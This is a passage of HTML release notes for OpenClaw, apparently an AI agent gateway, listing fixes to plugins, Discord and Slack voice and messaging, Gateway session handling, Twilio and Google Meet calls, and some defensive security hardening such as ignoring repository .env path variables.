<p>Security/Windows: ignore workspace <code>.env</code> system-path variables and resolve stale-process <code>taskkill.exe</code> from the validated Windows install root, preventing repository-local env files from redirecting cleanup helpers. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</p>
</li>
<li>
<p>CLI/plugins: refresh persisted plugin registry policy in place for <code>plugins enable</code> and <code>plugins disable</code>, so routine toggles no longer rebuild and hash every plugin source when the target is already indexed. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Windows/install: run npm from a writable installer temp directory and pin the Bedrock runtime dependency below a Windows ARM Node 24 npm resolver failure, so global OpenClaw installs no longer fail before onboarding. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mariozechner/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mariozechner">@mariozechner</a>.</p>
</li>
<li>
<p>CLI/plugins: scope install and enable slot selection to the selected plugin manifest/runtime fallback, so plugin installs no longer load every plugin runtime or broad status snapshot just to update memory/context slots. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/TTS: keep bundled speech-provider discovery available on cold package Gateway paths and add bundled plugin matrix runtime probes for health, readiness, RPC, TTS discovery, and post-ready runtime-deps watchdog coverage. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361552521" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75283" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75283/hovercard" href="https://github.com/openclaw/openclaw/issues/75283">#75283</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Google Meet/Twilio: show delegated voice call ID, DTMF, and intro-greeting state in <code>googlemeet doctor</code>, and avoid claiming DTMF was sent when no Meet PIN sequence was configured. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332551182" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72478" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72478/hovercard" href="https://github.com/openclaw/openclaw/issues/72478">#72478</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DougButdorf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DougButdorf">@DougButdorf</a>.</p>
</li>
<li>
<p>Plugins/tools: prefer built bundled plugin code during tool discovery and skip channel runtime hydration while preserving companion provider registrations, reducing per-run plugin-tool prep cost without dropping executable plugin tools. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361658522" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75290" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75290/hovercard" href="https://github.com/openclaw/openclaw/issues/75290">#75290</a>. Thanks @thanos-openclaw.</p>
</li>
<li>
<p>Plugins/loader: scope plugin-tool registry reuse to the enabled plugin plan and stored Gateway method keys, so embedded runner tool lookup can reuse compatible startup registries without hiding enabled non-startup plugin tools. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363466995" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75520" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75520/hovercard" href="https://github.com/openclaw/openclaw/issues/75520">#75520</a>. Thanks @whtoo.</p>
</li>
<li>
<p>Voice Call/Twilio: send notify-mode initial TwiML directly in the outbound create-call request while keeping conversation and pre-connect DTMF calls webhook-driven, so one-shot notify calls do not depend on a first-answer webhook fetch. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4335052780" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72758" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72758/hovercard" href="https://github.com/openclaw/openclaw/pull/72758">#72758</a>. Thanks @tyshepps.</p>
</li>
<li>
<p>Discord/Slack: defer status-reaction cleanup until run finalization so queued, thinking, tool, and terminal reactions no longer flicker during normal progress updates. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363934911" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75582" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75582/hovercard" href="https://github.com/openclaw/openclaw/pull/75582">#75582</a>)</p>
</li>
<li>
<p>Discord/voice: leave Discord voice off for text-only configs unless <code>channels.discord.voice</code> is explicitly configured, avoiding default <code>GuildVoiceStates</code> traffic and idle gateway CPU pressure for bots that do not use <code>/vc</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345485387" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73753" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73753/hovercard" href="https://github.com/openclaw/openclaw/issues/73753">#73753</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347706250" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74044" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74044/hovercard" href="https://github.com/openclaw/openclaw/issues/74044">#74044</a>. Thanks @sanchezm86 and @SecureCloudProjO.</p>
</li>
<li>
<p>Discord/voice: rerun configured voice auto-join after Discord gateway RESUMED events and ignore already-destroyed stale voice connections during reconnect cleanup, so health-monitor account restarts can rejoin configured channels. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4043554548" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40665" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/40665/hovercard" href="https://github.com/openclaw/openclaw/issues/40665">#40665</a>. Thanks @liz709.</p>
</li>
<li>
<p>Plugins/CLI: reuse the cold manifest registry while building plugin status and inspect reports, so large configured plugin sets no longer rediscover the bundled/plugin registry once per inspect row. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Discord/voice: lengthen the default voice join Ready wait, add configurable <code>voice.connectTimeoutMs</code>/<code>voice.reconnectGraceMs</code>, and warn before destroying unrecovered disconnected sessions so slow Discord voice handshakes and reconnects no longer fail silently. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4223830724" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63098" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63098/hovercard" href="https://github.com/openclaw/openclaw/issues/63098">#63098</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4041199935" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/39825" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/39825/hovercard" href="https://github.com/openclaw/openclaw/issues/39825">#39825</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4245973986" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65039" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65039/hovercard" href="https://github.com/openclaw/openclaw/issues/65039">#65039</a>. Thanks @darealgege, @kzicherman, and @ayochim.</p>
</li>
<li>
<p>Gateway/health: refresh cached health RPC snapshots when channel runtime state diverges, so Discord and other channel status reads no longer report stale running or connected values until the cache TTL expires. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362790644" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75423" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75423/hovercard" href="https://github.com/openclaw/openclaw/pull/75423">#75423</a>)</p>
</li>
<li>
<p>Gateway/sessions: keep session-store reads from running stale prune and entry-count cap maintenance during startup, so oversized stores no longer block chat history readiness after updates while writes and <code>sessions cleanup --enforce</code> still preserve the cleanup safeguards. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4307434486" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70050" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70050/hovercard" href="https://github.com/openclaw/openclaw/issues/70050">#70050</a>. Thanks @tangda18.</p>
</li>
<li>
<p>Security/audit: keep plain <code>security audit</code> on the cold config/filesystem path and reserve plugin runtime security collectors for <code>--deep</code>, so large plugin installs cannot execute every plugin runtime during routine audits. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Discord/voice: merge configured media-understanding providers such as Deepgram into partial active provider registries, so follow-up voice turns keep transcribing after another media plugin is already active. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4251059736" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65687" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65687/hovercard" href="https://github.com/openclaw/openclaw/issues/65687">#65687</a>. Thanks @OneMintJulep.</p>
</li>
<li>
<p>WhatsApp: stage <code>qrcode</code> through root mirrored runtime dependencies so packaged QR pairing can render from staged plugin-runtime-deps installs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362623764" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75394" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75394/hovercard" href="https://github.com/openclaw/openclaw/issues/75394">#75394</a>. Thanks @FelipeX2001.</p>
</li>
<li>
<p>Discord/voice: apply per-channel Discord <code>systemPrompt</code> overrides to voice transcript turns by forwarding the trusted channel prompt through the voice agent run. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4077930512" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47095" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/47095/hovercard" href="https://github.com/openclaw/openclaw/issues/47095">#47095</a>. Thanks @qearlyao.</p>
</li>
<li>
<p>Discord/native commands: send component-only interaction replies from slash command and status handlers instead of treating renderable Discord components as an empty response. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Slack/slash commands: send block-only slash command replies instead of dropping Slack block payloads with no plain-text fallback. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Telegram/messages: derive fallback text from interactive button/select labels before sending button-only payloads, so Telegram replies are not rejected as empty messages. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>LINE/messages: send quick-reply-only payloads with fallback option text instead of accepting the payload and returning an empty delivery. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Auto-reply/docking: require <code>/dock-*</code> route switches to start from direct chats, so group or channel participants cannot reroute a shared session's future replies into a linked DM. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Discord: keep text-DM main-session route updates pinned to the configured DM owner, matching component interactions so another direct-message sender cannot redirect future main-session replies. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Mattermost/Matrix: keep direct-message main-session route updates pinned to the configured DM owner so paired or temporarily allowed senders cannot redirect future shared-session replies. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Discord: keep SecretRef-backed bot tokens discoverable for message actions without resolving the token during schema generation, and resolve scoped channel SecretRefs before outbound agent message sends even when the tool is built from a config snapshot. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362174273" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75324" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75324/hovercard" href="https://github.com/openclaw/openclaw/issues/75324">#75324</a>. Thanks @slideshow-dingo and @Conan-Scott.</p>
</li>
<li>
<p>Updates: run package post-install doctor repair with the managed Gateway service profile and state paths when a daemon is installed, so shell/profile mismatches no longer repair the caller state while the restarted Gateway keeps stale config. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Models/DeepInfra: declare DeepInfra manifest catalog discovery and derive its runtime fallback catalog from the manifest, restoring provider-filtered <code>models list --all --provider deepinfra</code> rows without duplicated static model data. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>CLI/update: verify managed gateway restarts against the installed service port instead of the caller shell port, so package updates do not report a healthy daemon as failed when profiles use different gateway ports. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Gateway/agent: reject strict <code>openclaw agent --deliver</code> requests with missing delivery targets before starting the agent run, so users do not wait for a completed turn that cannot send anywhere. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Setup/import: honor non-interactive <code>--import-from</code> onboarding flags by running the migration import path instead of silently completing normal setup without importing anything. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Discord/voice: run voice-channel turns under a voice-output policy that hides the agent <code>tts</code> tool and asks for spoken reply text, so <code>/vc join</code> sessions synthesize and play agent replies instead of ending with <code>NO_REPLY</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4208687812" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61536" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61536/hovercard" href="https://github.com/openclaw/openclaw/issues/61536">#61536</a>. Thanks @aounakram.</p>
</li>
<li>
<p>Doctor/plugins: keep plain <code>doctor --non-interactive</code> from installing bundled plugin runtime dependencies, so headless health checks report missing deps while <code>doctor --fix</code> remains the explicit repair path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Doctor/gateway: require an interactive confirmation before installing or rewriting the Gateway service, so <code>doctor --fix --non-interactive</code> can repair plugin/config drift without replacing the operator's launchd/systemd service from a temporary environment. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/runtime-deps: include packaged OpenClaw identity in bundled plugin loader cache keys, so same-path package upgrades stop reusing stale versioned runtime-deps mirrors. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357604708" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75045" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75045/hovercard" href="https://github.com/openclaw/openclaw/issues/75045">#75045</a>. Thanks @sahilsatralkar.</p>
</li>
<li>
<p>Plugin SDK: restore reply-prefix and reply-pipeline helpers on the deprecated root/compat SDK surface so external plugins still using <code>openclaw/plugin-sdk</code> do not fail message dispatch after update. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4359892122" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75171" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75171/hovercard" href="https://github.com/openclaw/openclaw/issues/75171">#75171</a>. Thanks @zhangxiliang.</p>
</li>
<li>
<p>Plugins/runtime-deps: prune inactive same-package versioned runtime-deps roots after bundled dependency repair, so upgrades do not leave old <code>openclaw-&lt;version&gt;-&lt;hash&gt;</code> package caches behind after doctor runs. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/runtime-deps: prune legacy version-scoped plugin runtime-deps roots during bundled dependency repair and cover the path in Package Acceptance's upgrade-survivor matrix, so upgrades from 2026.4.x no longer leave stale per-plugin runtime trees after doctor runs. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/runtime-deps: keep Gateway startup plugin imports and runtime plugin fallback loads verify-only after startup/config repair planning, so packaged installs no longer spawn package-manager repair from hot paths after readiness. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361552521" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75283" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75283/hovercard" href="https://github.com/openclaw/openclaw/issues/75283">#75283</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357974990" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75069" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75069/hovercard" href="https://github.com/openclaw/openclaw/issues/75069">#75069</a>. Thanks @brokemac79 and @xiaohuaxi.</p>
</li>
<li>
<p>Plugins/runtime-deps: treat package.json runtime-deps manifests as supersets when generated materialization metadata is absent, so bundled plugin activation stops restaging already-installed dependency subsets on every activation. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362879118" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75429" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75429/hovercard" href="https://github.com/openclaw/openclaw/issues/75429">#75429</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362889795" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75431" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75431/hovercard" href="https://github.com/openclaw/openclaw/pull/75431">#75431</a>) Thanks @loyur.</p>
</li>
<li>
<p>iMessage: add stdin write callback and error listener to IMessageRpcClient so async EPIPE from a closed child process rejects the pending request instead of crashing the gateway with uncaughtException. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362994855" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75438" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75438/hovercard" href="https://github.com/openclaw/openclaw/issues/75438">#75438</a>.</p>
</li>
<li>
<p>MCP/stdio: settle MCP stdio transport send() from the write callback instead of resolving immediately on buffer acceptance, so async write errors reject the promise instead of being lost. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362994855" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75438" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75438/hovercard" href="https://github.com/openclaw/openclaw/issues/75438">#75438</a>.</p>
</li>
<li>
<p>Process/exec: add stdin error listener in runCommandWithTimeout so EPIPE from a prematurely-exited child is swallowed instead of escaping to uncaughtException. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362994855" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75438" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75438/hovercard" href="https://github.com/openclaw/openclaw/issues/75438">#75438</a>.</p>
</li>
<li>
<p>Voice Call/realtime: add default-off fast memory/session context for <code>openclaw_agent_consult</code>, giving live calls a bounded answer-or-miss path before the full agent consult. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329662019" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71849" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71849/hovercard" href="https://github.com/openclaw/openclaw/issues/71849">#71849</a>. Thanks @amzzzzzzz.</p>
</li>
<li>
<p>Google Meet: interrupt Realtime provider output when local barge-in clears playback, so command-pair audio stops model speech instead of only restarting Chrome playback. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346767837" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73850" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73850/hovercard" href="https://github.com/openclaw/openclaw/issues/73850">#73850</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346567653" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73834" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73834/hovercard" href="https://github.com/openclaw/openclaw/pull/73834">#73834</a>) Thanks @shhtheonlyperson.</p>
</li>
<li>
<p>Gateway/config: cap oversized plugin-owned schemas in the full <code>config.schema</code> response so large installed plugin sets cannot balloon Gateway RSS or crash schema clients. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/update: skip ClawHub and marketplace plugin updates when the bundled version is newer than the recorded installed version, so <code>openclaw update</code> no longer overwrites working bundled plugins with older external packages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363046993" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75447" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75447/hovercard" href="https://github.com/openclaw/openclaw/issues/75447">#75447</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</p>
</li>
<li>
<p>Gateway/sessions: use bounded tail reads for sessions-list transcript usage fallbacks and cap bulk title/last-message hydration, keeping large session stores responsive when rows request derived previews. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Gateway/sessions: yield during bulk transcript title/preview hydration and copy compaction checkpoints asynchronously, keeping the Gateway event loop responsive for large session stores and large transcripts. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362222686" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75330" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75330/hovercard" href="https://github.com/openclaw/openclaw/issues/75330">#75330</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362708402" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75414" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75414/hovercard" href="https://github.com/openclaw/openclaw/issues/75414">#75414</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</p>
</li>
<li>
<p>Gateway/sessions: stream bounded transcript reads for session detail, history, artifacts, compaction, and send/subscribe sequence paths so small Gateway requests no longer materialize large transcripts or OOM on oversized session logs. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Gateway/chat: bound chat-history transcript reads to the requested display window so large session logs no longer OOM the Gateway when clients ask for a small history page. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>BlueBubbles: detect audio attachments by Apple UTIs (<code>public.audio</code>, <code>public.mpeg-4-audio</code>, <code>com.apple.m4a-audio</code>, <code>com.apple.coreaudio-format</code>) in addition to <code>audio/*</code> MIME, so iMessage voice notes whose webhook payload only carries the UTI are now classified as audio in the inbound <code>&lt;media:audio&gt;</code> placeholder instead of falling through to the generic <code>&lt;media:attachment&gt;</code> tag. Thanks @omarshahine.</p>
</li>
<li>
<p>Voice Call/Twilio: honor stored pre-connect TwiML before realtime webhook shortcuts and reject DTMF sequences outside conversation mode, so Meet PIN entry cannot be skipped or silently dropped. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/donkeykong91/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/donkeykong91">@donkeykong91</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PfanP/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PfanP">@PfanP</a>.</p>
</li>
<li>
<p>Docs/sandboxing: clarify that sandbox setup scripts (<code>sandbox-setup.sh</code>, <code>sandbox-common-setup.sh</code>, <code>sandbox-browser-setup.sh</code>) are only available from a source checkout, and add inline <code>docker build</code> commands for npm-installed users so sandbox image setup works without cloning the repo. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363242333" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75485" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75485/hovercard" href="https://github.com/openclaw/openclaw/issues/75485">#75485</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</p>
</li>
<li>
<p>Google Meet/Voice Call: play Twilio Meet DTMF before opening the realtime media stream and carry the intro as the initial Voice Call message, so the greeting is generated after Meet admits the phone participant instead of racing a live-call TwiML update. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/donkeykong91/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/donkeykong91">@donkeykong91</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PfanP/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PfanP">@PfanP</a>.</p>
</li>
<li>
<p>Google Meet/Voice Call: make Twilio setup preflight honor explicit <code>--transport twilio</code> and fail local/private Voice Call webhook URLs, including IPv6 loopback and unique-local forms, before joins. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/donkeykong91/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/donkeykong91">@donkeykong91</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PfanP/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PfanP">@PfanP</a>.</p>
</li>
<li>
